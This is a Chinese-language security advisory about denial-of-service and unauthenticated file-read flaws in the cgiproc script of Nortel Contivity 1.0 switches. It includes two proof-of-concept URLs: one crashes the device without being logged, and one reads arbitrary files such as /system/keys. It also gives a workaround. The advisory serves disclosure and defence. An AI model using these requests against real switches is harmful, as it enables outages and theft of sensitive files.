发布日期：2001-01-19
更新日期：2001-01-19

受影响系统：

Nortel Networks Contivity 1.0

描述：

---

BUGTRAQ  ID: 938
CVE(CAN) ID: CVE-2000-0063,CVE-2000-0064

Contivity系列是Nortel公司开发的外网交换机产品。较新发布的Contivity交换机包含一个运行在VxWorks操作系统之上的httpd服务器用于提供远程基于Web的管理接口。

Contivity系列交换机Web管理接口的"cgiproc"脚本实现上存在漏洞，远程攻击者可能利用此漏洞对交换机进行拒绝服务攻击或查看任意系统文件。

因为没有对用户输入进行充分过滤，如果向cgiporc程序传递元字符，如"!"或"$"，系统就会崩溃。cgiproc的另一个漏洞是当请求管理页面时缺乏身份认证。这使攻击者能够查看Web服务器中的任何文件。

<*来源：foo （foo@blacklisted.intranova.net）
  
  链接：http://www.opennet.ru/base/fire/63.txt.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

foo （foo@blacklisted.intranova.net）提供了如下测试方法：

------------------------------------------
http://x.x.x.x/manage/cgi/cgiproc?$

[崩溃]

这个漏洞攻击不会被系统日志记录。
------------------------------------------

------------------------------------------
http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.

（文件名格式如：/system/filelist.dat、/system/version.dat、/system/keys、/system/core，等等。）

系统日志会记录这些请求：

09:44:23 tEvtLgMgr 0 : Security [12] Management: Request for cgiproc denied. requires login
------------------------------------------

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 关闭Web管理端口或对其设置访问认证。

厂商补丁：

Nortel Networks
---------------
目前厂商还没有提供补丁或者升级程序，承诺在VxWorks V2.60中修补此漏洞，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.nortelnetworks.com/index.html

浏览次数：4731
严重程度：0（网友投票）